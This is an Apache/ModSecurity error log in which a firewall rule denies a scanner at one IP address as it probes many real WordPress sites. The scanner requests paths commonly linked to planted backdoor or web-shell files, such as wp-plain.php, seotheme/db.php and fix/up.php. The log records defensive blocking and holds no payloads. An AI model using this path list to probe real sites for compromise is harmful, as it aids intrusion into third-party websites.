[Tue May 26 19:58:44.525017 2026] [security2:error] [pid 93868:tid 94348] [client 45.92.1.17:52463] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-plain.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uNgAAAek"], referer: www.google.com
[Tue May 26 19:58:44.528589 2026] [security2:error] [pid 93576:tid 93835] [client 45.92.1.17:52464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHGDRMqfxdEDkoszm_QAAAHs"], referer: www.google.com
[Tue May 26 19:58:44.552980 2026] [security2:error] [pid 93576:tid 93743] [client 45.92.1.17:52495] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-plain.php"] [unique_id "ahWuHGDRMqfxdEDkosznAQAAAB8"], referer: www.google.com
[Tue May 26 19:58:44.561986 2026] [security2:error] [pid 93576:tid 93760] [client 45.92.1.17:52507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHGDRMqfxdEDkosznAgAAADA"], referer: www.google.com
[Tue May 26 19:58:44.597964 2026] [security2:error] [pid 93576:tid 93761] [client 45.92.1.17:52511] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHGDRMqfxdEDkosznAwAAADE"]
[Tue May 26 19:58:44.646290 2026] [security2:error] [pid 93868:tid 94273] [client 45.92.1.17:52656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wp-plain.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uQQAAAZ4"], referer: www.google.com
[Tue May 26 19:58:44.651740 2026] [security2:error] [pid 93868:tid 94343] [client 45.92.1.17:52657] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uQgAAAeQ"], referer: www.google.com
[Tue May 26 19:58:44.655556 2026] [security2:error] [pid 93868:tid 94319] [client 45.92.1.17:52658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uRAAAAcw"]
[Tue May 26 19:58:44.709590 2026] [security2:error] [pid 93868:tid 94267] [client 45.92.1.17:52713] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uRQAAAZg"]
[Tue May 26 19:58:44.751649 2026] [security2:error] [pid 93868:tid 94335] [client 45.92.1.17:52709] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uSwAAAdw"], referer: www.google.com
[Tue May 26 19:58:44.755712 2026] [security2:error] [pid 93868:tid 94369] [client 45.92.1.17:52708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-plain.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uTAAAAf4"], referer: www.google.com
[Tue May 26 19:58:44.785616 2026] [security2:error] [pid 93868:tid 94379] [client 45.92.1.17:52744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uTgAAAgg"], referer: www.google.com
[Tue May 26 19:58:44.786017 2026] [security2:error] [pid 93576:tid 93727] [client 45.92.1.17:52741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHGDRMqfxdEDkosznDQAAAA8"]
[Tue May 26 19:58:44.786251 2026] [security2:error] [pid 93868:tid 94379] [client 45.92.1.17:52737] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/wp-plain.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uTwAAAgg"], referer: www.google.com
[Tue May 26 19:58:44.800318 2026] [security2:error] [pid 93868:tid 94365] [client 45.92.1.17:52800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-plain.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uUgAAAfo"], referer: www.google.com
[Tue May 26 19:58:44.826890 2026] [security2:error] [pid 93868:tid 94291] [client 45.92.1.17:52816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uUwAAAbA"], referer: www.google.com
[Tue May 26 19:58:44.828782 2026] [security2:error] [pid 93868:tid 94311] [client 45.92.1.17:52815] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/nsehmxwv.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uVAAAAcQ"], referer: www.google.com
[Tue May 26 19:58:44.829610 2026] [security2:error] [pid 93576:tid 93712] [client 45.92.1.17:52819] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHGDRMqfxdEDkosznEwAAAAA"]
[Tue May 26 19:58:44.855896 2026] [security2:error] [pid 93868:tid 94282] [client 45.92.1.17:52827] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/htntzaiw.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uVgAAAac"], referer: www.google.com
[Tue May 26 19:58:44.908603 2026] [security2:error] [pid 93868:tid 94329] [client 45.92.1.17:52889] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uWgAAAdY"], referer: www.google.com
[Tue May 26 19:58:44.909013 2026] [security2:error] [pid 93576:tid 93798] [client 45.92.1.17:52888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-plain.php"] [unique_id "ahWuHGDRMqfxdEDkosznGQAAAFY"], referer: www.google.com
[Tue May 26 19:58:44.918919 2026] [core:error] [pid 93576:tid 93797] (104)Connection reset by peer: [client 45.92.1.17:52710] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 19:58:44.920728 2026] [security2:error] [pid 93868:tid 94302] [client 45.92.1.17:52890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uWwAAAbs"]
[Tue May 26 19:58:44.921310 2026] [security2:error] [pid 93868:tid 94283] [client 45.92.1.17:52905] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uXAAAAag"]
[Tue May 26 19:58:44.921840 2026] [security2:error] [pid 93576:tid 93776] [client 45.92.1.17:52903] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-plain.php"] [unique_id "ahWuHGDRMqfxdEDkosznGwAAAEA"], referer: www.google.com
[Tue May 26 19:58:44.931578 2026] [security2:error] [pid 93868:tid 94337] [client 45.92.1.17:52901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uXgAAAd4"]
[Tue May 26 19:58:44.932143 2026] [security2:error] [pid 93868:tid 94325] [client 45.92.1.17:52923] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uXwAAAdI"], referer: www.google.com
[Tue May 26 19:58:44.935386 2026] [security2:error] [pid 93576:tid 93811] [client 45.92.1.17:52918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-plain.php"] [unique_id "ahWuHGDRMqfxdEDkosznHgAAAGM"], referer: www.google.com
[Tue May 26 19:58:44.935510 2026] [security2:error] [pid 93868:tid 94373] [client 45.92.1.17:52904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uYwAAAgI"], referer: www.google.com
[Tue May 26 19:58:44.936677 2026] [security2:error] [pid 93868:tid 94321] [client 45.92.1.17:52913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uZQAAAc4"], referer: www.google.com
[Tue May 26 19:58:44.938823 2026] [security2:error] [pid 93868:tid 94378] [client 45.92.1.17:52922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uZgAAAgc"]
[Tue May 26 19:58:44.939510 2026] [security2:error] [pid 93868:tid 94315] [client 45.92.1.17:52914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/wp-plain.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uZwAAAcg"], referer: www.google.com
[Tue May 26 19:58:44.958880 2026] [security2:error] [pid 93868:tid 94262] [client 45.92.1.17:52932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/msdswgxz.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uaQAAAZM"], referer: www.google.com
[Tue May 26 19:58:44.966900 2026] [security2:error] [pid 93868:tid 94300] [client 45.92.1.17:52954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uagAAAbk"]
[Tue May 26 19:58:44.981165 2026] [security2:error] [pid 93868:tid 94292] [client 45.92.1.17:52990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-plain.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25ubAAAAbE"], referer: www.google.com
[Tue May 26 19:58:44.996572 2026] [security2:error] [pid 93868:tid 94278] [client 45.92.1.17:52826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25ubgAAAaM"], referer: www.google.com
[Tue May 26 19:58:44.997065 2026] [security2:error] [pid 93868:tid 94350] [client 45.92.1.17:52993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25ubwAAAes"], referer: www.google.com
[Tue May 26 19:58:45.001855 2026] [security2:error] [pid 93868:tid 94275] [client 45.92.1.17:52994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25ucgAAAaA"]
[Tue May 26 19:58:45.015758 2026] [security2:error] [pid 93868:tid 94354] [client 45.92.1.17:53007] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25udgAAAe8"], referer: www.google.com
[Tue May 26 19:58:45.016959 2026] [security2:error] [pid 93868:tid 94326] [client 45.92.1.17:53004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25ueAAAAdM"], referer: www.google.com
[Tue May 26 19:58:45.018334 2026] [security2:error] [pid 93576:tid 93821] [client 45.92.1.17:53008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHWDRMqfxdEDkosznJwAAAG0"]
[Tue May 26 19:58:45.041655 2026] [security2:error] [pid 93576:tid 93744] [client 45.92.1.17:53033] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/pbnizbgj.php"] [unique_id "ahWuHWDRMqfxdEDkosznKQAAACA"], referer: www.google.com
[Tue May 26 19:58:45.053668 2026] [security2:error] [pid 93868:tid 94371] [client 45.92.1.17:52879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/vkzgagub.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uegAAAgA"], referer: www.google.com
[Tue May 26 19:58:45.078596 2026] [security2:error] [pid 93576:tid 93735] [client 45.92.1.17:53055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHWDRMqfxdEDkosznKgAAABc"], referer: www.google.com
[Tue May 26 19:58:45.080746 2026] [security2:error] [pid 93868:tid 94336] [client 45.92.1.17:53054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25ufwAAAd0"], referer: www.google.com
[Tue May 26 19:58:45.081507 2026] [security2:error] [pid 93576:tid 93767] [client 45.92.1.17:52909] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHWDRMqfxdEDkosznKwAAADc"], referer: www.google.com
[Tue May 26 19:58:45.082188 2026] [security2:error] [pid 93868:tid 94298] [client 45.92.1.17:53057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25ufgAAAbc"]
[Tue May 26 19:58:45.082916 2026] [security2:error] [pid 93868:tid 94285] [client 45.92.1.17:53046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uhAAAAao"], referer: www.google.com
[Tue May 26 19:58:45.083268 2026] [security2:error] [pid 93576:tid 93730] [client 45.92.1.17:53044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHWDRMqfxdEDkosznLQAAABI"], referer: www.google.com
[Tue May 26 19:58:45.083492 2026] [security2:error] [pid 93576:tid 93826] [client 45.92.1.17:53045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHWDRMqfxdEDkosznLAAAAHI"]
[Tue May 26 19:58:45.093136 2026] [security2:error] [pid 93868:tid 94297] [client 45.92.1.17:53059] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/tsyifwmg.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uhgAAAbY"], referer: www.google.com
[Tue May 26 19:58:45.101760 2026] [security2:error] [pid 93868:tid 94358] [client 45.92.1.17:52935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uiQAAAfM"], referer: www.google.com
[Tue May 26 19:58:45.102728 2026] [security2:error] [pid 93576:tid 93789] [client 45.92.1.17:53068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/aegnvmnm.php"] [unique_id "ahWuHWDRMqfxdEDkosznLwAAAE0"], referer: www.google.com
[Tue May 26 19:58:45.108703 2026] [security2:error] [pid 93868:tid 94370] [client 45.92.1.17:52506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uigAAAf8"]
[Tue May 26 19:58:45.133804 2026] [security2:error] [pid 93576:tid 93777] [client 45.92.1.17:52907] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWuHGDRMqfxdEDkosznHAAAAEE"], referer: www.google.com
[Tue May 26 19:58:45.178318 2026] [core:error] [pid 93576:tid 93723] (104)Connection reset by peer: [client 45.92.1.17:52987] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 19:58:45.188858 2026] [security2:error] [pid 93576:tid 93731] [client 45.92.1.17:53032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHWDRMqfxdEDkosznMQAAABM"], referer: www.google.com
